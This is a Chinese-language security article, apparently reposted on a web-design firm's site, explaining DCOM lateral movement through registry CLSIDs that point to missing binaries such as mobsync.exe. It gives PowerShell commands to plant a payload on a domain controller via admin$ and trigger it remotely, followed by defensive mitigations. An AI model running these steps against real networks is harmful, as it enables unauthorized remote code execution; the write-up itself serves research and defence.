使用DCOM怎么實現(xiàn)橫向滲透，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

成都創(chuàng)新互聯(lián)公司服務項目包括宜昌網(wǎng)站建設(shè)、宜昌網(wǎng)站制作、宜昌網(wǎng)頁制作以及宜昌網(wǎng)絡(luò)營銷策劃等。多年來，我們專注于互聯(lián)網(wǎng)行業(yè)，利用自身積累的技術(shù)優(yōu)勢、行業(yè)經(jīng)驗、深度合作伙伴關(guān)系等，向廣大中小型企業(yè)、政府機構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案，宜昌網(wǎng)站推廣取得了明顯的社會效益與經(jīng)濟效益。目前，我們服務的客戶以成都為中心已經(jīng)輻射到宜昌省份的部分城市，未來相信會繼續(xù)擴大服務區(qū)域并繼續(xù)獲得客戶的支持與信任！

引言

在此之前，關(guān)于DCOM橫向滲透技術(shù)的內(nèi)容討論了已經(jīng)有一年半載了，Matt Nelson (enigma0x3)此前也介紹過多種利用D/COM對象（例如MMC20、ShellWindows,ShellBrowserWindow、Excel和Outlook）實現(xiàn)的橫向滲透技術(shù)。相應的，Philip Tsukerman (@PhilipTsukerman)也發(fā)現(xiàn)過一種有趣的WMI橫向滲透技術(shù)，他的【    這篇文章】可以幫助大家更好地了解DCOM功能、橫向滲透技術(shù)以及相應的緩解方案。在繼續(xù)閱讀本文之前，我強烈建議大家閱讀一下這些資料。

研究動機

幾周之前，我打算對我的筆記本系統(tǒng)進行虛擬化分析，雖然轉(zhuǎn)換過程非常痛苦，但最終還是在相關(guān)工具的幫助下成功了。但是考慮到安全問題，我需要確定原本的物理設(shè)備中是否還存有遺留數(shù)據(jù)，我手上沒有什么標準可以遵循，而且我對數(shù)字取證方面有額不感興趣。所以我打算研究一下注冊表，然后我很快就找到了一個有趣的CLSID注冊表路徑，它引用了一份二進制文件，而這個文件很可能是筆記本上為某個程序提供實用功能或者診斷功能的一個程序：

通過DIR命令查詢后，我們發(fā)現(xiàn)磁盤中并沒有C:\WINDOWS\system32\IntelCpHDCPSvc.exe：

我的腦海里瞬間出現(xiàn)了下面三個想法：

1.   IntelCpHDCPSvc.exe是什么鬼？

2.   軟件卸載工具并沒有完全刪除舊軟件遺留在注冊表里的東西。

3.   這似乎是一個DCOM應用（使用Get-CimInstanceWin32_DCOMApplication查詢語句進行驗證）。

通過搜索引擎得知，IntelCpHDCPSvc.exe跟英特爾的內(nèi)容保護HDCP服務有關(guān)，但是最有意思的是，LocalServer32和InProcServer32這兩個注冊表鍵值指向的是本應該存在的二進制文件路徑，而這些不存在的文件很可能會帶來嚴重的安全風險。由于在真實的攻擊中我們很少能夠看到IntelCpHDCPSvc的身影，因此我想看看能否可以利用DCOM來做些什么。

DCOM橫向滲透方法論

定位二進制文件

首先，我們需要在DCOM應用中定位相應的二進制文件路徑。這里我們可以利用下面的命令從Windows 2012中導出LocalServer32可執(zhí)行程序和InProcServer32 DLL：

gwmiWin32_COMSetting -computername 127.0.0.1 | ft LocalServer32 -autosize |Out-String -width 4096 | out-file dcom_exes.txt

gwmiWin32_COMSetting -computername 127.0.0.1 | ft InProcServer32 -autosize |Out-String -width 4096 | out-file dcom_dlls.txt

我們得到了下列信息：

對數(shù)據(jù)進行拼接和過濾之后，我們可以使用下列命令查詢這些文件：

$file= gc C:\Users\test\desktop\dcom_things.txt

foreach($binpath in $file) {

 $binpath

 cmd.exe /c dir $binpath > $null

}

查詢結(jié)果如下：

%SystemRoot%\system32\mobsync.exe

FileNot Found

如下圖所示，文件確實不存在：

實際上，mobsync是Microsoft同步中心和脫機文件功能中的一個進程，因此mobsync.exe又開始變得更加有趣了。

驗證AppID和CLSID

之前我在枚舉AppID和CLSID方面沒有做得很好，所以我重新查看了注冊表并查找這些信息：

具體說來，在下個階段中我們需要利用[C947D50F-378E-4FF6-8835-FCB50305244D]這個CLSID來創(chuàng)建DCOM對象實例。

遠程Payload執(zhí)行和橫向滲透

首先我們需要滿足以下條件：

1.   在遠程實例化DCOM對象之前，我們需要拿到管理員權(quán)限。

2.   為了發(fā)揮Payload的作用，我們將嘗試滲透目標主機所在域環(huán)境。假設(shè)已經(jīng)拿到了管理員賬號憑證，我們將以Windows 10作為攻擊端，然后在Windows 2012域控制器（DC）上嘗試實現(xiàn)遠程命令執(zhí)行。

首先是Payload，并確保目標系統(tǒng)中不包含mobsync.exe：

dir C:\evil.exe
dir \\acmedc\admin$\system32\mobsync.exe

非常好！由于mobsync.exe不存在，所以我們的Payload（evil.exe）就能夠繞過主機保護機制了，然后將其拷貝到DC上：

copy C:\evil.exe \\acmedc\admin$\system32\mobsync.exe
dir \\acmedc\admin$\system32\mobsync.exe

由于我們的二進制文件無法識別DCOM，因此實例化操作將無法成功，但Payload還是可以成功觸發(fā)的：

[activator]::CreateInstance([type]::GetTypeFromCLSID("C947D50F-378E-4FF6-8835-FCB50305244D","target"))

Windows10域成員：

Windows2012域控制器：

非常好，我們的“mobsync.exe”生成了惡意的“notepad.exe” Payload。

緩解方案

廠商：

1.   當軟件工具被卸載之后，確保沒有DCOM注冊表項遺留。

2.   不要在注冊表中創(chuàng)建指向并不存在的二進制文件的DCOM程序路徑。

網(wǎng)絡(luò)防御端：

1.   認真閱讀enigma0x3以及@PhilipTsukerman在各自文章中給出的建議，有針對性地收集相關(guān)IoC。

2.   避免重復使用主機賬號憑證。

3.   部署深度防御策略以及安全監(jiān)控產(chǎn)品。

4.   監(jiān)控文件系統(tǒng)及注冊表。

5.   監(jiān)控網(wǎng)絡(luò)環(huán)境中的異常PowerShell操作，盡量強制啟用PowerShell的受限語言模式（CLM）。

6.   當DCOM調(diào)用失敗時，主機的系統(tǒng)日志中會生成ID為10010的錯誤事件信息，其中將包含CLSID信息。

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關(guān)知識有進一步的了解或閱讀更多相關(guān)文章，請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對創(chuàng)新互聯(lián)的支持。

網(wǎng)站題目：使用DCOM怎么實現(xiàn)橫向滲透
網(wǎng)頁路徑：http://aaarwkj.com/article10/goojdo.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站設(shè)計公司、響應式網(wǎng)站、域名注冊、全網(wǎng)營銷推廣、搜索引擎優(yōu)化、面包屑導航

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)